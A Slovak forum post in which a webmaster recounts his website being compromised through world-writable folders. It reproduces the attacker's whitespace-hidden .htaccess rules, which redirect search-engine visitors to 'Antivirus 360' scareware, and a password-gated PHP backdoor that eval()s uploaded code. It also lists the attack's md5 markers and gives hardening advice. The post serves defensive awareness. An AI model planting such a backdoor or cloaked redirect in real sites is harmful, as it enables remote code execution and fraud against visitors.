Asi pred mesiacom som na svojom ftpčku objavil náhodou nejaké neznáme súbory. Nelogické názvy súborov a htaccess súbory, ktoré som na ftp neupoval ja. Dokazoval to i držiteľ súborov - www_data. Vtedy som si uvedomil, že nejaký útočník zneužil môj chmod 777 na viacerých priečinkoch, nahral do nich súbory , a pomocou htaccess súborov sa pokúšal presmerovať návštevníka do priečinku kafo/ex3/t.htm., kde sa mu zobrazila takáto stránka:
http://www.trustedsource.org/dynamic/bl ... Access.png
Vtedy som ešte detailnejšie nepreskúmal, čo chcel docieliť pomocou htaccess súborov. Po ich otvorení sa zdalo, že v nich nie sú žiadne údaje - na úvod súboru totiž pridal whitespaces, o čom svedčil scroller. Po zalomení riadkov som uvidel takýto kód:
Kód:
# a0b4df006e02184c60dbf503e71c87ad RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC]
RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=
RewriteCond %{HTTP_REFERER} \=[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <59
RewriteRule ^.*$ /images/zmensene/kafo/ex3/t.htm [L]
# a995d2cc661fa72452472e9554b5520c
Našiel som i súbory ako nanofonger.php, joguk.php , oruceka.php, ruvadaz.php, ifu.php , všetky s rovnakým kódom:
Kód:
<?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo "<pre>"; testdata('start'); if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){ eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); }; testdata('end'); echo "</pre>"; ?>
Útočnik prešiel všetky priečinky na ftp a ziťoval, do ktorých by sa mu dali zapísať súbory. Túto chybu využil na uploadnutie nebezpečných súborov a všetkých návštevníkov, ktorý pristupovali na stránku z googla a najznámejších vyhľadávačov presmeroval na túto ním podvrhnutú stránku. Po jej otvorení mi začalo vyhadzovať javascript alerty, že môj pc môže byť napadnutý a odporúčalo mi stiahnuť program Antivirus 360.
Po kliknutí na ok som bol presmerovaný na web tohto akože antivírusu, kde boli pripravené flash animácie kontroly disku. Upozornili ma , že sa mi v PC nachádzajú trojan a spyware a že si mám urýchlene stiahnuť ich produkt, ktorý mi ich pomôže odstrániť.
Ťuknutím v gooli sa dalo zistiť, čo za program to v skutočnosti je.
http://www.google.com/search?client=ope ... 8&oe=utf-8.
Citácia:
Program is very dangerous, it mark windows files as an infections or serious threats. The main purpose of it is to show pop-ups and suck money. About fixing of infections you can forget it wasn’t created for that. As a parasite, Antivirus360 can do many serious problems for users, slowdown computer, limit connection of internet, increase loses of personal data and even brake your machine. We recommend you scan your system with reputable spyware remover programs to avoid problems.
Viac na
http://www.2-spyware.com/remove-antivirus-360.htmlZrušil som teda chmod 777 na všetkých priečinkoch a rozhodol som sa mesiac počkať. Dúfal som, že sa táto pliaga na môj web už nevráti. Keďže som po mesiaci potreboval spustiť upload script tak som opäť povolil chmod 777, no pliaga sa vrátila späť a pokiaľ to neochránim ináč, tak sa aj bude.
Veľa článkov nájdete cez google, tie užitočnejšie sú:
http://blog.scansafe.com/journal/2008/7 ... ction.htmlhttp://www.trustedsource.org/blog/109/W ... cking-Bloghttp://solace.ucsd.edu/msgs/msg.ssjs?ms ... ssage=3839Takto nejak vyzerá hacknutá stránka.
http://www.zone-h.net/defaced/2008/02/0 ... awocam.phpNa všetkých napadnutých stránkach sú md5 checksumy
Kód:
a0b4df006e02184c60dbf503e71c87ad
58b88a45be0d79102c748768ecb82d09
a995d2cc661fa72452472e9554b5520c
takže po ich ťuknutí do googlu vám ujo google vypľuje zoznam takto napadnutých stránok.
Čo je smutné, že sa táto pliaga začína rozširovať i po slovenských portáloch.
Mala by sa teda venovať väčšia pozornosť pri zabezpečovaní webstránok, lebo nakoniec na to doplatia obe strany - návštevník, ktorému budú ukradnuté dáta z PC a portál, ktorý bude ukrátený o návštevníkov z vyhľadávačov.
Skontrolujte si, či sa na vašom FTP nenachádzajú nejaké neznáme súbory, skontrolujte taktiež css a js súbory a v neposlednom rade htaccess súbory. Neodporúčam mať zapnuté directory listing.
Citácia:
To counter the attacks, ensure all PHP apps are updated to their most current versions and modify the php.ini (and Apache httpd.conf file if applicable) to set allow_url_fopen to off. (The default is on).
Kto vie, nech sa podelí s nami o spôsob lepšieho zabezpečenia pri upload scriptoch, nastaveniach atribútov a spôsobe akým možno predísť takémuto napadnutiu stránky. Slovenské portály, u ktorých som našiel md5 checksumy signalizujúce takéto napadnutie som už upozornil, uvidíme teda, ako si s tým poradia.
http://www.google.com/search?hl=sk&clie ... lr=lang_sk
Dik
Choď na stránku: